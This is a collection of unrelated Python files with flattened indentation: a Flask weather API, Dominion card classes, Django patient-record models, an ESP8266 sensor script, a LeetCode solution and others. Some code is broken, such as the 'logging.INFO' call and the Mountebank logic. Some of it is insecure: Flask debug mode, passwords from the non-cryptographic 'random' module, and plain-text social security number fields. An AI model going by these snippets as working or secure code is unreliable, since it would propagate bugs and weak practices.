# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to each table
Station = Base.classes.station
Measurement = Base.classes.measurement
# Create our session (link) from Python to the DB
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
return (
f"Welcome to My Surfs Up! API! It is totally tubular!<br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation:<br/>"
f"/api/v1.0/stations<br/>"
f'/api/v1.0/tobs<br/>'
f'/api/v1.0/<start><br/>'
f'(enter start date in YYYY-MM-DD format to view temperatures after that date)<br/>'
f'EX: /api/v1.0/2015-08-16<br/>'
f'/api/v1.0/<start>/<end><br/>'
f"(enter start date then end date second in 'YYYY-MM-DD' format to view temperatures between those dates)<br/>"
f"EX: /api/v1.0/2015-08-16/2016-02-15"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
results = session.query(Measurement.date, Measurement.prcp).all()
date_temp_info = []
for measurement in results:
date_temp_dict = {
'date' : measurement.date,
'prcp' : measurement.prcp
}
date_temp_dict["date"] = measurement.date
date_temp_dict["prcp"] = measurement.prcp
date_temp_info.append(date_temp_dict)
return jsonify(date_temp_info)
@app.route("/api/v1.0/stations")
def stations():
results = session.query(Station.station,Station.name).all()
station_info = []
for station in results:
station_name = {
'station' : station.station,
'name' : station.name
}
station_name["station"] = station.station
station_name["name"] = station.name
station_info.append(station_name)
return jsonify(station_info)
@app.route("/api/v1.0/tobs")
def tobs():
results = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date>= '2016-08-23').\
order_by(Measurement.date).all()
tobs_data = []
for observations in results:
tobs_dict = {
'date' : observations.date,
'tobs' : observations.tobs
}
tobs_dict["date"] = observations.date
tobs_dict["tobs"] = observations.tobs
tobs_data.append(tobs_dict)
return jsonify(tobs_data)
@app.route("/api/v1.0/<start_date>")
def temp_start(start_date):
results = session.query(Measurement.date, func.min(Measurement.tobs).label('min_temp'),
func.avg(Measurement.tobs).label('avg_temp'),
func.max(Measurement.tobs).label('max_temp')).\
filter(Measurement.date >= start_date).all()
start_stats = []
for stats in results:
start_dict = {
'min_temp' : stats.min_temp,
'avg_temp' : stats.avg_temp,
'max_temp' : stats.max_temp
}
start_dict["min_temp"] = stats.min_temp
start_dict["avg_temp"] = stats.avg_temp
start_dict["max_temp"] = stats.max_temp
start_stats.append(start_dict)
return jsonify(start_stats)
@app.route("/api/v1.0/<start_date>/<end_date>")
def temp_range(start_date, end_date):
results = session.query(Measurement.date, func.min(Measurement.tobs).label('min_temp'),
func.avg(Measurement.tobs).label('avg_temp'),
func.max(Measurement.tobs).label('max_temp')).\
filter((Measurement.date >= start_date) & (Measurement.date <= end_date)).all()
range_stats = []
for stats in results:
range_dict = {
'min_temp' : stats.min_temp,
'avg_temp' : stats.avg_temp,
'max_temp' : stats.max_temp
}
range_dict["min_temp"] = stats.min_temp
range_dict["avg_temp"] = stats.avg_temp
range_dict["max_temp"] = stats.max_temp
range_stats.append(range_dict)
return jsonify(range_stats)
if __name__ == "__main__":
app.run(debug=True)
|
def distance_from_zero(number):
if type(number) == int or type(number) == float :
positive = abs(number)
print("The number :\n", positive , "true")
else:
print("Nope")
distance_from_zero("dfkk")
|
from cards_and_decks import *
from base_set import *
class Loan(Treasure):
def cost(self):
return 3
def value(self):
return 1
def text(self):
return [
"When you play this, reveal cards from your deck until you " + \
"reveal a Treasure. Discard or it trash it. Discard the other cards."
]
def discard_or_trash(self, pid, payload):
if payload.get('discard'):
self.deck.discard += self.revealed
else:
self.deck.discard += self.revealed[:-1]
self.game.trash.append(self.revealed[-1])
return {'clear': True}
def preplay(self, payload):
card = None
self.revealed = []
while True:
card = self.deck.peek()
if card is None:
break
self.revealed.append(self.deck.library.pop())
if card.is_treasure():
break
if card is not None:
self.game.add_callback(
'discard_or_trash',
self.discard_or_trash,
[self.deck.player]
)
return {'revealed': [x.dict() for x in self.revealed]}
class TradeRoute(Reaction):
def cost(self):
return 3
def text(self):
return [
"+1 Buy",
"+$1 per token on the Trade Route mat.",
"Trash a card from your hand.",
"------",
"Setup: Put a token on each Victory card Supply pile. When a " + \
"card is gained from that pile, move the token to the Trade " + \
"Route mat."
]
def play(self, payload):
card = payload.get('card')
if not isinstance(card, dict):
return {'error': 'Invalid trash card.'}
c = self.deck.trash_hand(card)
if c is None:
return {'error': 'Card {0} not in hand'.format(card.get('name'))}
self.game.add_buys(1)
self.game.add_money(len(self.game.victories_gained))
return {}
class Watchtower(Reaction):
def cost(self):
return 3
def reacts_to(self):
return ['gain']
def react(self, pid, payload):
deck = self.game.players[pid].deck
if self.gained in deck.discard:
if payload.get('trash'):
self.game.trash.append(self.gained)
deck.discard.remove(self.gained)
elif payload.get('put_top'):
deck.library.append(self.gained)
deck.discard.remove(self.gained)
return {'clear': True}
def register_reaction(self, pid, card):
self.gained = card
self.game.queue_callback(
'watchtower:{0}'.format(card.name()),
self.react,
[self.game.players[pid]]
)
def text(self):
return [
"Draw until you have 6 cards in hand.",
"When you gain a card, you may reveal this from your hand. If " + \
"you do, either trash that card, or put it on top of your deck.",
]
def play(self, payload):
while len(self.deck.hand) < 6:
if not self.deck.draw():
break
return {}
class Bishop(Action):
def cost(self):
return 4
def text(self):
return [
"+$1",
"+1 VP token",
"Trash a card from your hand. +VP tokens equal to half its cost " + \
"in coins, rounded down. Each other player may trash a card " + \
"from his hand."
]
def maybe_trash(self, pid, payload, gain_vp=False):
if 'card' not in payload:
return {'error': 'Parameter card is required.'}
card = payload['card']
if not isinstance(card, dict):
return {'error': 'Card is invalid.'}
deck = self.game.players[pid].deck
c = deck.trash_hand(card)
if c is None:
return {'error': 'Card {0} not found in hand'.format(card.get('name'))}
if gain_vp:
self.game.players[pid].victory_tokens += c.cost() / 2
return {'clear': True}
def play(self, payload):
result = self.maybe_trash(self.deck.player.id, payload, True)
if 'error' in result:
return result
self.game.add_callback(
'maybe_trash',
self.maybe_trash,
self.game.opponents()
)
return result
class Monument(Action):
def cost(self):
return 4
def text(self):
return [
"+$2",
"+1 VP token."
]
def play(self, payload):
self.deck.player.victory_tokens += 1
self.game.add_money(2)
return {}
class Quarry(Treasure):
def cost(self):
return 4
def value(self):
return 1
def text(self):
return [
"While this is in play, Action cards cost $2 less, but " + \
"not less than $0."
]
def discount(self, card, cost):
if card.is_action():
cost -= 2
return max(cost, 0)
def preplay(self, payload):
self.deck.player.discounts.append(self.discount)
return {}
class Talisman(Treasure):
def cost(self):
return 4
def value(self):
return 1
def text(self):
return [
"While this is in play, when you buy a card costing $4 or " + \
"less that is not a Victory card, gain a copy of it."
]
def effect(self, card):
self.game.gain(self.deck, card.name())
def preplay(self, payload):
self.game.on_buy(
lambda x: x.effective_cost(self.deck.player) <= 4 and not x.is_victory(),
self.effect
)
return {}
class WorkersVillage(Action):
def cost(self):
return 4
def text(self):
return [
"+1 Card",
"+2 Actions",
"+1 Buy",
]
def play(self, payload):
self.deck.draw()
self.game.add_actions(2)
self.game.add_buys(1)
return {}
class City(Action):
def cost(self):
return 5
def text(self):
return [
"+1 Card",
"+2 Actions",
"If there are one or more empty Supply piles, +1 Card. " + \
"If there are two or more, +$1 and +1 Buy."
]
def play(self, payload):
self.deck.draw()
self.game.add_actions(2)
if self.game.empty_stacks >= 1:
self.deck.draw()
if self.game.empty_stacks >= 2:
self.game.add_money(1)
self.game.add_buys(1)
return {}
class Contraband(Treasure):
def cost(self):
return 5
def value(self):
return 3
def text(self):
return [
"+1 Buy",
"When you play this, the player to your left names a card. " + \
"You can't buy that card this turn.",
]
def name_contraband(self, pid, payload):
card = payload.get('card')
if not isinstance(card, dict):
return {'error': 'Invalid card chosen.'}
if not self.game.active_player.add_contraband(card):
return {'error': 'No such card {0}'.format(card.get('name'))}
return {'clear': True}
def preplay(self, payload):
self.game.add_callback(
'name_contraband',
self.name_contraband,
self.game.opponents()[0:1]
)
return {}
class CountingHouse(Action):
def cost(self):
return 5
def text(self):
return [
"Look through your discard pile, reveal any number of Copper " + \
"cards from it, and put them into your hand."
]
def play(self, payload):
if 'count' not in payload:
return {'error': 'Parameter count required.'}
count = payload['count']
if not isinstance(count, int):
return {'error': 'Parameter count must be an int.'}
coppers = [x for x in self.deck.discard if x.name() == 'Copper']
if len(coppers) < count:
return {'error': 'You do not have that many coppers in your discard.'}
for i in xrange(count):
self.deck.hand.append(coppers[i])
self.deck.discard.remove(coppers[i])
return {}
class Mint(Action):
def cost(self):
return 5
def text(self):
return [
"You may reveal a Treasure card from your hand. Gain a copy of " + \
"it. When you buy this, trash all Treasures you have in play."
]
def on_buy(self):
for card in self.deck.tmp_zone:
if card.is_treasure():
self.game.trash.append(card)
self.deck.tmp_zone.remove(card)
return {}
def play(self, payload):
card = payload.get('card')
if not isinstance(card, dict):
return {'error': 'Invalid card chosen.'}
if self.deck.find_card_in_hand(card) is None:
return {'error': 'Card {0} not in hand.'.format(card.get('name'))}
self.game.gain(self.deck, card.get('name'))
return {}
class Mountebank(Attack):
def cost(self):
return 5
def text(self):
return [
"+$2",
"Each other player may discard a Curse. If he doesn't, he " + \
"gains a Curse and a Copper.",
]
def preplay(self, payload):
self.game.add_buys(2)
return {}
def discard_curse(self, pid, payload):
deck = self.game.players[pid].deck
if payload.get('discard'):
c = deck.discard_hand({'name': 'Curse'})
if c is None:
return {'error': 'No Curse to discard.'}
else:
self.game.gain(deck, 'Curse')
self.game.gain(deck, 'Copper')
return {'clear': True}
def attack(self, players):
self.game.add_money(2)
self.game.add_callback("discard_curse", self.discard_curse, players)
class Rabble(Attack):
def cost(self):
return 5
def text(self):
return [
"+3 Cards",
"Each other player reveals the top 3 cards of his deck, " + \
"discards the revealed Actions and Treasures, and puts the " + \
"rest back on top in any order he chooses.",
]
def preplay(self, payload):
self.deck.draw(3)
return {}
def choose_order(self, pid, payload):
if not isinstance(payload.get('cards'), list):
return {'error': 'Cards must be list.'}
cards = []
revealed = self.revealed[pid]
if len(revealed) != len(payload['cards']):
return {'error': 'Must reorder all cards.'}
for card in payload['cards']:
if not isinstance(card, dict):
revealed += cards
return {'error': 'Invalid card.'}
matching = [x for x in revealed if x.name() == card.get('name')]
if not matching:
revealed += cards
return {'error': 'Card not in revealed cards.'}
cards.append(matching[0])
revealed.remove(matching[0])
self.game.players[pid].deck.library += cards
return {'clear': True}
def attack(self, players):
self.revealed = {}
for player in players:
deck = player.deck
cards = []
for i in xrange(3):
c = deck.peek()
if c is None:
break
cards.append(deck.library.pop())
discarded = []
new_cards = []
for card in cards:
if card.is_treasure() or card.is_action():
discarded.append(card)
else:
new_cards.append(card)
deck.discard += discarded
self.revealed[player.id] = new_cards
self.game.log.append({
'pid': player.id,
'action': 'reveal_top_3',
'revealed': [x.dict() for x in new_cards],
'discarded': [x.dict() for x in discarded],
})
self.game.add_callback('choose_order', self.choose_order, players)
class RoyalSeal(Treasure):
def cost(self):
return 5
def value(self):
return 2
def text(self):
return [
"While this is in play, when you gain a card, you may put that " + \
"card on top of your deck."
]
def put_top(self, pid, payload):
if payload.get('put_top'):
deck = self.game.players[pid].deck
if self.bought in deck.discard:
deck.library.append(self.bought)
deck.discard.remove(self.bought)
return {'clear': True}
def effect(self, card):
self.bought = card
self.game.add_callback('put_top', self.put_top, [self.game.active_player])
def preplay(self, payload):
self.game.on_gain(lambda x: True, self.effect)
return {}
class Vault(Action):
def cost(self):
return 5
def text(self):
return [
"+2 Cards",
"Discard any number of cards. +$1 per card discarded. Each " + \
"other player may discard 2 cards. If he does, he draws a card.",
]
def cycle(self, pid, payload):
if not isinstance(payload.get('cards'), list):
return {'error': 'Cards must be list.'}
if not payload['cards']:
return {'clear': True}
if len(payload['cards']) != 2:
return {'error': 'Must discard exactly 2 cards, or none.'}
deck = self.game.players[pid].deck
cards = []
for card in payload['cards']:
if not isinstance(card, dict):
deck.hand += cards
return {'error': 'Invalid card'}
c = deck.find_card_in_hand(card)
if c is None:
deck.hand += cards
return {'error': 'Card {0} not in hand'.format(card.get('name'))}
cards.append(c)
deck.hand.remove(c)
deck.discard += cards
deck.draw()
return {'clear': True}
def discard_cards(self, pid, payload):
if not isinstance(payload.get('cards'), list):
return {'error': 'Cards must be list.'}
deck = self.game.players[pid].deck
cards = []
for card in payload['cards']:
if not isinstance(card, dict):
deck.hand += cards
return {'error': 'Invalid card'}
c = deck.find_card_in_hand(card)
if c is None:
deck.hand += cards
return {'error': 'Card {0} not in hand'.format(card.get('name'))}
cards.append(c)
deck.hand.remove(c)
deck.discard += cards
self.game.add_money(len(cards))
return {'clear': True}
def play(self, payload):
self.deck.draw(2)
self.game.add_callback('discard_cards', self.discard_cards, [self.game.active_player])
self.game.add_callback('cycle', self.cycle, self.game.opponents())
return {}
class Venture(Treasure):
def cost(self):
return 5
def value(self):
return 1
def text(self):
return [
"When you play this, reveal cards from your deck until you " + \
"reveal a Treasure. Discard the other cards. Play that Treasure."
]
def preplay(self, payload):
revealed = []
while True:
c = self.deck.peek()
if c is None:
break
self.deck.library.pop()
if c.is_treasure():
self.deck.tmp_zone.append(c)
self.game.log.append({
'pid': self.game.active_player.id,
'action': 'venture',
'played': c.dict(),
})
c.play({})
break
revealed.append(c)
self.deck.discard += revealed
return {}
class Goons(Militia):
def cost(self):
return 6
def text(self):
return [
"+1 Buy",
"+$2",
"Each other player discards down to 3 cards in hand. " + \
"While this is in play, when you buy a card, +1 VP token.",
]
def effect(self, card):
self.game.active_player.victory_tokens += 1
def preplay(self, payload):
self.game.add_buys(1)
self.game.add_money(2)
self.game.on_buy(lambda x: True, self.effect)
return {}
class GrandMarket(Action):
def cost(self):
return 6
def text(self):
return [
"+1 Card",
"+1 Action",
"+1 Buy",
"+$2",
"You can't buy this if you have any Copper in play.",
]
def on_buy(self):
c = self.deck.find_card_in_tmp_zone({'name': 'Copper'})
if c is not None:
return {'error': 'Cannot buy Grand Market when Copper in play.'}
else:
return {}
def play(self, payload):
self.deck.draw()
self.game.add_actions(1)
self.game.add_buys(1)
self.game.add_money(2)
return {}
class Hoard(Treasure):
def cost(self):
return 6
def value(self):
return 2
def text(self):
return [
"While this is in play, when you buy a Victory card, gain a Gold."
]
def effect(self, card):
self.game.gain(self.deck, 'Gold')
def preplay(self, payload):
self.game.on_buy(lambda x: x.is_victory(), self.effect)
return {}
class Bank(Treasure):
def cost(self):
return 7
def value(self):
val = 0
if not self.deck:
return val
return len([x for x in self.deck.tmp_zone if x.is_treasure()])
def text(self):
return [
"When you play this, it's worth $1 per Treasure card you " + \
"have in play (counting this)."
]
class Expand(Remodel):
def __init__(self, game):
super(Expand, self).__init__(game, 3)
def cost(self):
return 7
class Forge(Action):
def cost(self):
return 7
def text(self):
return [
"Trash any number of cards from your hand. Gain a card with " + \
"cost exactly equal to the total cost in coins of the trashed cards."
]
def play(self, payload):
if 'cards' not in payload:
return {'error': 'No cards to trash.'}
if not isinstance(payload['cards'], list):
return {'error': 'Cards must be list.'}
if 'gain' not in payload:
return {'error': 'No card gained.'}
gain = payload['gain']
if not isinstance(gain, dict):
return {'error': 'Gained card invalid.'}
name = gain.get('name')
gained = self.game.card_from_name(name)
if gained is None:
return {'error': 'No such card {0}'.format(name)}
total_cost = 0
cards = []
for card in payload['cards']:
if not isinstance(card, dict):
self.deck.hand += cards
return {'error': 'Invalid card'}
c = self.deck.find_card_in_hand(card)
if c is None:
self.deck.hand += cards
return {'error': 'Card {0} not in hand'.format(card.get('name'))}
total_cost += c.cost()
cards.append(c)
self.deck.hand.remove(c)
if gained.cost() != total_cost:
self.deck.hand += cards
return {'error': 'Gained card must have equal cost to sum of trashed cards.'}
c = self.game.gain(self.deck, name)
if c is None:
self.deck.hand += cards
return {'error': 'Could not gain {0}'.format(name)}
self.game.trash += cards
return {}
class KingsCourt(ThroneRoom):
def __init__(self, game):
super(KingsCourt, self).__init__(game, 2)
def cost(self):
return 7
class Peddler(Action):
def cost(self):
cost = 8
if not self.game.active_deck:
return cost
for card in self.game.active_deck.tmp_zone:
if card.is_action():
cost -= 2
return max(cost, 0)
def text(self):
return [
"+1 Card",
"+1 Action",
"+$1",
"During your Buy phase, this costs $2 less per Action card " + \
"you have in play, but not less than $0."
]
def play(self, payload):
self.deck.draw()
self.game.add_actions(1)
self.game.add_money(1)
return {}
class Platinum(Treasure):
def cost(self):
return 9
def value(self):
return 5
class Colony(Victory):
def cost(self):
return 11
def points(self):
return 10
|
number = 0
while number < 100:
number = number + 1
if number / 10 == 3:
print("짝!!!")
elif number / 10 == 6:
print("짝!!!")
elif number / 10 == 9:
print("짝!!!")
elif number % 10 == 3:
print("짝!!")
elif number % 10 == 6:
print("짝!!")
elif number % 10 == 9:
print("짝!!")
else:
print(number)
|
import sys
import numpy as np
from numpy.lib.function_base import delete
def gridToGraph(n,m):
# Created vertice grid of n x m size
grid = [(i,j) for j in range(m) for i in range(n)]
gridVer = np.zeros((n,m), dtype=int)
# Create mapping from each grid coords to vertice id (0..n)
names = dict()
for v in range(len(grid)):
names[grid[v]] = v
# Vertices as id's
vertices = list(names.values())
# Add grid edges as an undirected graph, and replace coords with vertices id's (0..n)
edges = []
for (r,c) in grid:
v1 = names[(r,c)]
if (r+1) < n:
edges.append((v1, names[(r+1,c)])) # Down
gridVer[r+1,c] = names[(r+1,c)]
if (c+1) < m:
edges.append((v1, names[(r,c+1)])) # Right
gridVer[r,c+1] = names[(r,c+1)]
return vertices, sorted(edges), gridVer
def adjMatrix(vertices, edges):
# Create adjacency matrix
N = len(vertices)
adj = np.array([[0 for _ in range(0, N)] for _ in range(0, N)])
for u,v in edges:
adj[u][v] = 1
adj[v][u] = 1
return adj
class Node:
def __init__(self, type):
self.type = type
self.bag = []
self.child = None
# def decomposeGridGraph(a):
# aT = a.T
# T = []
# for i in range(len(aT)):
# t = []
# if i > 0: t.extend(aT[i-1])
# t.extend(aT[i])
# T.append(t)
# return T
def decomposeGridGraph2(a, adj):
aT = a.T
root = Node("introduce")
node = root
for i in range(len(aT)):
for j in range(len(aT[i])):
w = aT[i,j]
node.bag.append(w)
for x in node.bag:
if x!=w and adj[w,x] == 0:
childForget = Node("forget")
childForget.bag.extend([v for v in node.bag if v != x])
node.child = childForget
node = childForget
break
adj[i,j]
childIntro = Node("introduce")
childIntro.bag.extend(node.bag)
node.child = childIntro
node = childIntro
n = root
i = 1
while n != None:
print(i, n.type, n.bag)
n = n.child
i+=1
if __name__ == "__main__":
vertices, edges, gridVer = gridToGraph(4,3)
print(gridVer)
adj = adjMatrix(vertices, edges)
# print(edges)
# print(adj)
# a =np.array([[11,12,13],[21,22,23],[31,32,33],[41,42,43]])
# print(a)
# print()
# # print("Decomposed graph")
# # print(decomposeGridGraph(a))
# # print()
decomposeGridGraph2(gridVer, adj.T) |
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
import string
import random
from utils import str_to_date
class Doctor(models.Model):
user = models.OneToOneField(User, primary_key=True)
token = models.CharField(max_length=200)
current_patient_id = models.IntegerField(null=True, blank=True)
def set_random_password(self):
user = self.user
all_chars = string.letters + string.digits + string.punctuation
password = ''.join((random.choice(all_chars)) for x in range(20))
user.set_password(password)
user.save()
return password
class Patient(models.Model):
doctor = models.ForeignKey(User)
first_name = models.CharField(max_length=200, blank=True)
middle_name = models.CharField(max_length=200, null=True, blank=True)
last_name = models.CharField(max_length=200, blank=True)
address = models.CharField(max_length=200, blank=True)
email = models.CharField(max_length=200, blank=True)
home_phone = models.CharField(max_length=14, blank=True)
cell_phone = models.CharField(max_length=14, blank=True)
city = models.CharField(max_length=200, blank=True)
emergency_contact_name = models.CharField(max_length=200, blank=True)
emergency_contact_phone = models.CharField(max_length=200, blank=True)
emergency_contact_relation = models.CharField(max_length=200, blank=True)
employer = models.CharField(max_length=200, blank=True)
employer_city = models.CharField(max_length=200, blank=True)
employer_address = models.CharField(max_length=200, blank=True)
employer_state = models.CharField(max_length=200, blank=True)
employer_zip_code = models.CharField(blank=True, max_length=200)
primary_care_physician = models.CharField(
max_length=200, blank=True, null=True
)
zip_code = models.CharField(max_length=5, blank=True, null=True)
state = models.CharField(max_length=2, blank=True, null=True)
social_security_number = models.CharField(max_length=20, blank=True)
responsible_party_name = models.CharField(max_length=200, blank=True)
responsible_party_phone = models.CharField(max_length=14, blank=True)
responsible_party_relation = models.CharField(max_length=200, blank=True)
responsible_party_email = models.CharField(max_length=200, blank=True)
def __str__(self):
return "{0}, {1}".format(self.last_name, self.first_name)
@classmethod
def column_list(cls):
cols = ['doctor', 'first_name', 'middle_name', 'last_name', 'address',
'email', 'home_phone', 'cell_phone', 'city', 'zip_code',
'emergency_contact_name', 'emergency_contact_phone', 'state',
'emergency_contact_relation', 'employer', 'employer_city',
'employer_state', 'employer_address', 'primary_care_physician',
'social_security_number', 'responsible_party_name',
'responsible_party_phone', 'responsible_party_relation',
'responsible_party_email']
return cols
class Problem(models.Model):
patient = models.ForeignKey(Patient)
date_changed = models.DateField(null=True, blank=True)
date_diagnosis = models.DateField(null=True, blank=True)
date_onset = models.DateField(null=True, blank=True)
description = models.TextField(blank=True)
name = models.CharField(max_length=200, blank=True)
notes = models.TextField(blank=True)
status = models.CharField(max_length=200, blank=True)
def __str__(self):
return self.name
def set_additional_attrs(self, request):
self.set_patient(request.user.doctor.current_patient_id)
self.set_dates(request.POST)
def set_patient(self, patient_id):
patient = Patient.objects.get(pk=patient_id)
self.patient = patient
def set_dates(self, data):
self.date_onset = str_to_date(data['date_onset'])
self.date_diagnosis = str_to_date(data['date_diagnosis'])
class Medication(models.Model):
doctor = models.ForeignKey(User)
patient = models.ForeignKey(Patient)
daw = models.BooleanField()
name = models.CharField(max_length=200)
prn = models.BooleanField()
date_prescribed = models.DateField(null=True, blank=True)
date_started_taking = models.DateField(null=True, blank=True)
date_stopped_taking = models.DateField(null=True, blank=True)
dispense_quantity = models.FloatField(null=True, blank=True)
dosage_quantity = models.FloatField(null=True, blank=True)
notes = models.TextField(blank=True)
frequency = models.CharField(max_length=200, blank=True)
number_refills = models.IntegerField(blank=True, null=True)
order_status = models.CharField(max_length=200, blank=True, null=True)
status = models.CharField(max_length=200, blank=True)
def __str__(self):
return self.name
def set_additional_attrs(self, request):
self.doctor = request.user
self.set_patient(request.user.doctor.current_patient_id)
self.set_dates(request.POST)
def set_patient(self, patient_id):
patient = Patient.objects.get(pk=patient_id)
self.patient = patient
def set_dates(self, data):
self.date_prescribed = str_to_date(data['date_prescribed'])
self.date_started_taking = str_to_date(data['date_started_taking'])
self.date_stopped_taking = str_to_date(data['date_stopped_taking'])
class Allergy(models.Model):
patient = models.ForeignKey(Patient)
notes = models.TextField(blank=True)
reaction = models.CharField(max_length=200, blank=True)
status = models.CharField(max_length=200, blank=True)
def __str__(self):
return self.reaction
def set_patient(self, patient_id):
patient = Patient.objects.get(pk=patient_id)
self.patient = patient
class Insurance(models.Model):
rank = models.IntegerField()
payer_name = models.CharField(max_length=200)
state = models.CharField(max_length=2)
patient = models.ForeignKey(Patient)
def __str__(self):
return self.payer_name
class Appointment(models.Model):
patient = models.ForeignKey(Patient)
scheduled_time = models.CharField(max_length=200)
status = models.CharField(max_length=200, blank=True)
def __str__(self):
return self.scheduled_time
class Meta:
ordering = ['scheduled_time']
|
from spectrum import arma2psd, arburg # pip install spectrum
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot as plt
from pandas import DataFrame
from pandas import Series
from pandas import concat
from pandas import read_csv
from pandas import datetime
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential #单支线性网络模型
from keras.layers import Dense
from keras.layers import LSTM
#---input--------
data1 = pd.read_csv('close300m.csv')
data = pd.read_csv('close500d.csv')
data2 = pd.read_csv('close500m.csv')# 股市大跌停牌的一段时间会报错,显示rho为负值,除此之外一切正常
data3 = pd.read_csv('close50030m.csv')
data = data.drop(np.where(data.iloc[:,1] == 0)[0])
data = data.dropna()
dataset = data.iloc[:,1]
dataset = dataset.astype('float32')
print(dataset.shape)
#---funtion call------
from myFunc import burgSimple,lstmDiff
input = dataset.ravel()
selected2,tradeP2 = lstmDiff(dataset)
plt.scatter(selected2,tradeP2,s = 10,c='#DC143C',marker='o')
plt.plot(input,c='#0000CD')
plt.grid(True)
plt.title('close price - time(ZZ500 30m)')
plt.scatter(selected2,tradeP2[selected2],s = 20,c='g',marker='o')
plt.show() |
import esp
import dht
import time
import json
import machine
import network
from umqtt.simple import MQTTClient
p = machine.Pin(2, machine.Pin.OUT)
p.on()
p2 = machine.Pin(4, machine.Pin.PULL_UP)
d = dht.DHT11(machine.Pin(2))
BLINK_DELAY=0.1
MEASR_DELAY=2
def blink():
p.off()
time.sleep(BLINK_DELAY)
p.on()
p2.on()
time.sleep(BLINK_DELAY)
p2.off()
def get_rssi():
nets = sta.scan()
for n in nets:
if n[0].decode() == settings["network"]:
return n[3]
return None
def ctof(t):
return t * (9 / 5) + 32
f = open("settings.json")
raw_settings = "".join(f.readlines())
f.close()
settings = json.loads(raw_settings)
sta = network.WLAN(network.STA_IF)
sta.active(True)
sta.connect(settings["network"], settings["password"])
c = MQTTClient(settings["name"], settings["broker"])
while True:
if sta.isconnected():
c.connect()
break
time.sleep(1)
counter = 0
while True:
d.measure()
blink()
c.publish(settings["topic"], "Blinked! Free mem: {}, Count: {}, Temp: {}, RH: {}, RSSI: {}".format(esp.freemem(), counter, ctof(d.temperature()), d.humidity(), get_rssi()))
counter += 1
time.sleep(MEASR_DELAY)
|
"""
Solution for 50. Pow(x, n)
https://leetcode.com/problems/powx-n/
"""
class Solution:
"""
Runtime: 28 ms, faster than 64.49% of Python3 online submissions for Pow(x, n).
Memory Usage: 12.9 MB, less than 100.00% of Python3 online submissions for Pow(x, n).
"""
def myPow(self, x: float, n: int) -> float:
"""
Implement pow(x, n), which calculates x raised to the power n (xn).
Example 1:
Input: 2.00000, 10
Output: 1024.00000
Example 2:
Input: 2.10000, 3
Output: 9.26100
Example 3:
Input: 2.00000, -2
Output: 0.25000
Explanation: 2-2 = 1/22 = 1/4 = 0.25
Note:
-100.0 < x < 100.0
n is a 32-bit signed integer, within the range [−231, 231 − 1]
Args:
x:
n:
Returns:
"""
if n < 0:
x = 1 / x
n = -n
return self.recursive(x, n)
def cheat(self, x: float, n: int) -> float:
"""
A solution using power operator (cheating!)
Args:
x:
n:
Returns:
"""
return x ** n
def brute_force(self, x: float, n: int) -> float:
"""
Most straight forward solution that runs in O(N) in time and O(1) in space
Args:
x:
n:
Returns:
"""
if n < 0:
x = 1 / x
n = -n
ans = 1
for _ in range(n):
ans *= x
return ans
def recursive(self, x: float, n: int) -> float:
"""
A recursive solution that runs in O(LogN) in time and O(logN) in space
Args:
x:
n:
Returns:
"""
if n == 0:
return 1.0
half = self.recursive(x, n // 2)
if n % 2 == 0:
return half * half
return half * half * x
|
import logging
logging.basicConfig(filename='logloglog.log', level=logging.INFO)
logging.INFO('lalala')
|
from distutils.version import LooseVersion
from . codes import CMDTYPE, LEDTYPE, SPIChipsets, BufferChipsets
from bibliopixel.drivers.return_codes import RETURN_CODES, print_error
from bibliopixel.util import log, util
from bibliopixel.project.importer import import_symbol
class Devices(object):
"""Manage a list of serial devices."""
def __init__(self, hardware_id, baudrate):
self.hardware_id = hardware_id
self.baudrate = baudrate
self.serial = import_symbol('serial')
self.list_ports = import_symbol('serial.tools.list_ports')
def find_serial_devices(self):
self.devices = {}
hardware_id = "(?i)" + self.hardware_id # forces case insensitive
for ports in self.list_ports.grep(hardware_id):
port = ports[0]
id = 0
ver = 0
if getattr(ports, '__len__', lambda: 0)():
log.debug('Multi-port device %s:%s:%s with %s ports found',
self.hardware_id, id, ver, len(ports))
if id < 0:
log.debug('Serial device %s:%s:%s with id %s < 0',
self.hardware_id, id, ver)
else:
self.devices[id] = port, ver
return self.devices
def get_device(self, id=None):
if id is None:
if not self.devices:
raise ValueError('No default device for %s' % self.hardware_id)
id, (device, version) = sorted(self.devices.items())[0]
elif id in self.devices:
device, version = self.devices[id]
else:
error = 'Unable to find device with ID %s' % self.deviceID
log.error(error)
raise ValueError(error)
log.info("Using COM Port: %s, Device ID: %s, Device Ver: %s",
device, id, version)
return id, device, version
def error(self):
error = "There was an unknown error communicating with the device."
log.error(error)
raise IOError(error)
|
import matplotlib.pyplot as plt
import math
import os.path
def plot(plot_star=1, plot_gas=1, plot_mid=0, x_axis="dynamical", SFE=[0.5, 0.5], SFEN=[], log_SFR=[7, 8], IMF="Kroupa"):
# SFR = [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8] # log_10 star formation rate [solar mass/yr]
# SFD = [2.65, 1.77, 1.24, 0.93, 0.67, 0.47, 0.32, 0.22, 0.15, 0.1] # star formation duration [Gyr]
# SFD2 = [2.75, 1.87, 1.34, 1.03, 0.77, 0.57, 0.42, 0.32, 0.25, 0.2] # star formation duration [Gyr]
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(0, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
# plt.plot(SFR, SFD)
# plt.plot(SFR, SFD2)
# plt.xlabel(r'log$_{10}$(SFR [M$_\odot$/yr])')
# plt.ylabel('$\delta$t [Gyr]')
# # plt.xlim(6.4, 1.01 * log_time_axis[-1])
# # plt.ylim(-3, 0.5)
########################
final_stellar_mass_list = [] # x-axis
final_stellar_mass_list_dif = [] # x-axis
LumDyn_list = [] # x-axis
final_dynamical_mass_list = [] # x-axis
final_dynamical_mass_list_dif = [] # x-axis
total_mas_in_box_list = [] # x-axis
